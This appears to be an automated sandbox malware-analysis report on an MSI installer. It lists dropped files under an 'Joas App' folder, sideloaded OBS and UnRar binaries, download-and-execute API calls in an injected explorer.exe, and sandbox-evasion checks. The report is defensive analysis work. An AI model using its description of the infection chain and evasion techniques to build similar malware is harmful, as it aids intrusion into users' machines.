Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\Projects\WinRAR\rar\build\unrar64\Release\UnRAR.pdb source: UnRar.exe, 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp, UnRar.exe, 00000005.00000000.2292652385.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: K064a7Rfk7.msi
Source: Binary string: Microsoft.Web.WebView2.Core.pdb source: K064a7Rfk7.msi
Source: Binary string: ucrtbase.pdbUGP source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.2.dr
Source: Binary string: w32-pthreads.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2338942242.00007FFDAC148000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: K064a7Rfk7.msi, MSIE1FA.tmp.2.dr, MSIE336.tmp.2.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: K064a7Rfk7.msi
Source: api-ms-win-core-synch-l1-2-0.dll.2.drStatic PE information: 0x8A188CB0 [Tue Jun 2 13:31:28 2043 UTC]
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EED32 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,7_2_00007FFD936EED32
Source: vcruntime140.dll.2.drStatic PE information: section name: _RDATA
Source: BCUninstaller.exe.2.drStatic PE information: section name: _RDATA
Source: createdump.exe.2.drStatic PE information: section name: _RDATA
Source: UnRar.exe.2.drStatic PE information: section name: _RDATA
Source: avformat-60.dll.2.drStatic PE information: section name: .xdata
Source: avutil-58.dll.2.drStatic PE information: section name: .xdata
Source: swresample-4.dll.2.drStatic PE information: section name: .xdata
Source: swscale-7.dll.2.drStatic PE information: section name: .xdata
Source: zlib.dll.2.drStatic PE information: section name: .xdata
Source: avcodec-60.dll.2.drStatic PE information: section name: .rodata
Source: avcodec-60.dll.2.drStatic PE information: section name: .xdata
Source: MSIE0DE.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE18B.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE1CA.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE1FA.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE249.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE289.tmp.2.drStatic PE information: section name: .fptable
Source: MSIE336.tmp.2.drStatic PE information: section name: .fptable
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1CB60 pushfd ; retf 11_2_00C1CB61
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C19B01 push ecx; ret 11_2_00C19B14
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1CCCC push esp; iretd 11_2_00C1CCCD
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1CCE4 pushfd ; iretd 11_2_00C1CCE5
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C224A4 push edi; retn 0000h11_2_00C224CA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C224A8 push edi; retn 0000h11_2_00C224CA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21EC8 push ds; retn 0000h11_2_00C21ECA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21EDB push ds; retn 0000h11_2_00C21EDE
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21E94 push ds; retn 0000h11_2_00C21E96
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C1C63D push esi; ret 11_2_00C1C646
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C21F10 push ds; retn 0000h11_2_00C21F16
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C049A0 ExitProcess,CreateThread,URLDownloadToFileA,GetFileAttributesA,Sleep,GetTempPathA,wsprintfA,GetFileAttributesA,CreateDirectoryA,wsprintfA,lstrlenA,lstrcpyA,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateFileA,WriteFile,CloseHandle,GetLastError,GetLastError,GetFileAttributesA,MoveFileA,GetLastError,GetLastError,ShellExecuteA,GetLastError,GetLastError,DeleteFileA,GetLastError,GetLastError,wsprintfA,lstrlenA,lstrcpyA,lstrlenA,GetProcessHeap,HeapFree,WaitForSingleObject,VirtualFree,11_2_00C049A0
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE18B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1FA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avutil-58.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE336.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swresample-4.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE249.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE1CA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE289.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avformat-60.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\w32-pthreads.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\avcodec-60.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD936EB840 FreeLibrary,free,calloc,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryExW,_aligned_free,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_errno,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryExA,FreeLibrary,free,wcslen,GetModuleFileNameW,_aligned_free,_aligned_free,_aligned_free,wcscpy,LoadLibraryExW,LoadLibraryExW,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,GetSystemDirectoryW,GetSystemDirectoryW,GetSystemDirectoryW,wcscpy,LoadLibraryExW,_aligned_free,_aligned_free,_aligned_free,_aligned_free,7_2_00007FFD936EB840
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFD93702D90 rdtsc 7_2_00007FFD93702D90
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE0DE.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\msvcp140.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE336.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\BCUninstaller.exeJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE249.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE18B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE1CA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE1FA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\zlib.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\utest.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE289.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\vcruntime140_1.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\swscale-7.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeAPI coverage: 6.2 %
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeAPI coverage: 8.2 %
Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 7.3 %
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCCED8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACCCED8
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACFF850 FindFirstFileExA,5_2_00007FF7AACFF850
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A430 TryEnterCriticalSection,TerminateThread,SetThreadpoolStackInformation,SetConsoleHistoryInfo,PrefetchVirtualMemory,GetQueuedCompletionStatusEx,SystemTimeToFileTime,GetExitCodeProcess,CreateSymbolicLinkTransactedW,FindFirstFileW,LoadModule,OpenFile,OpenThread,SetFileTime,WaitForThreadpoolWorkCallbacks,FreeLibraryAndExitThread,PowerCreateRequest,InterlockedPushListSListEx,LocalFileTimeToFileTime,FindCloseChangeNotification,CreateThreadpoolCleanupGroup,QueryFullProcessImageNameW,Wow64GetThreadSelectorEntry,IsValidNLSVersion,FreeLibraryAndExitThread,CreateEventExW,SetPriorityClass,IsValidNLSVersion,RegisterApplicationRecoveryCallback,GetFileSize,GlobalFree,GetFileMUIInfo,SetConsoleActiveScreenBuffer,LCIDToLocaleName,7_2_00007FFDA378A430
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785730 SetFocus,CreateFileTransactedW,GetWindowContextHelpId,VirtualAlloc,FindNextVolumeMountPointW,OpenWaitableTimerW,FindNextStreamW,AddSIDToBoundaryDescriptor,EnterCriticalSection,DeleteSynchronizationBarrier,RemoveDirectoryTransactedW,LogicalToPhysicalPoint,OpenClipboard,SetWindowRgn,GetCommProperties,ShowCursor,GetFileBandwidthReservation,VirtualAlloc,GetProcessHeap,DeleteTimerQueueTimer,WriteTapemark,GlobalHandle,SetStdHandle,CreateTimerQueueTimer,GetProcessVersion,ReadConsoleOutputW,FindFirstFileW,GetProcessVersion,GetConsoleTitleW,HeapAlloc,7_2_00007FFDA3785730
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA37872D0 RegisterClassW,CreateWindowExW,ShowWindow,UpdateWindow,FindFirstFileW,FindClose,GetTempPathW,GetFileAttributesW,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,CreateSolidBrush,FillRect,DeleteObject,GetObjectW,GetDIBits,SelectObject,DeleteDC,DeleteObject,CreateDirectoryW,type_info::_name_internal_method,GetMessageW,TranslateMessage,DispatchMessageW,7_2_00007FFDA37872D0
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA38345D4 FindFirstFileExW,7_2_00007FFDA38345D4
Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C12159 FindFirstFileExW,11_2_00C12159
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA3785FA0 DebugActiveProcessStop,HeapSetInformation,SetFileIoOverlappedRange,WaitForThreadpoolIoCallbacks,GetLastError,ApplicationRecoveryFinished,DuplicateHandle,Wow64EnableWow64FsRedirection,GetNumaProcessorNodeEx,HeapReAlloc,SetFileAttributesW,GetNumaNodeNumberFromHandle,FindClose,GetModuleHandleW,GetLargestConsoleWindowSize,CopyFile2,LocalAlloc,GetCommConfig,AddResourceAttributeAce,SetThreadDesktop,EndMenu,GetTopWindow,SetCursorPos,AttachThreadInput,FlashWindowEx,DdeQueryNextServer,GetPhysicallyInstalledSystemMemory,QueryMemoryResourceNotification,MoveFileExW,SetThreadIdealProcessor,FlashWindow,CreateDialogParamW,SetTapePosition,SetThreadAffinityMask,DeleteMenu,IsDBCSLeadByte,FlashWindowEx,GetSystemInfo,PaintDesktop,SleepConditionVariableCS,ResolveLocaleName,IsWow64Process,GetLogicalProcessorInformation,SetFileBandwidthReservation,DeviceIoControl,FileTimeToLocalFileTime,FindResourceExW,AllocateUserPhysicalPages,WaitForThreadpoolTimerCallbacks,LoadLibraryW,GetCurrentProcess,FindClose,EnumResourceLanguagesW,ConvertThreadToFiberEx,EnumDateFormatsExW,ReadDirectoryChangesW,GetConsoleAliasesLengthW,FindNextVolumeMountPointW,7_2_00007FFDA3785FA0
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2315188964.000001D153220000.00000004.00001000.00020000.00000000.sdmp, obs-ffmpeg-mux.exe, 00000007.00000002.2315129206.000001D153170000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |PIPE|vbOXtRAYipc d
Source: explorer.exe, 0000000B.00000002.2323731959.0000000000C00000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: |vbOXgUEST ||
Source: classes.jsa.2.drBinary or memory string: [Ljava/lang/VirtualMachineError;
Source: classes.jsa.2.drBinary or memory string: ,jdk.vm.ci.hotspot.HotSpotJVMCIBackendFactory
Source: obs-ffmpeg-mux.exe, 00000007.00000002.2326785273.00007FFD9209A000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Video @!
Source: classes.jsa.2.drBinary or memory string: ()Ljdk/vm/ci/runtime/JVMCICompiler;
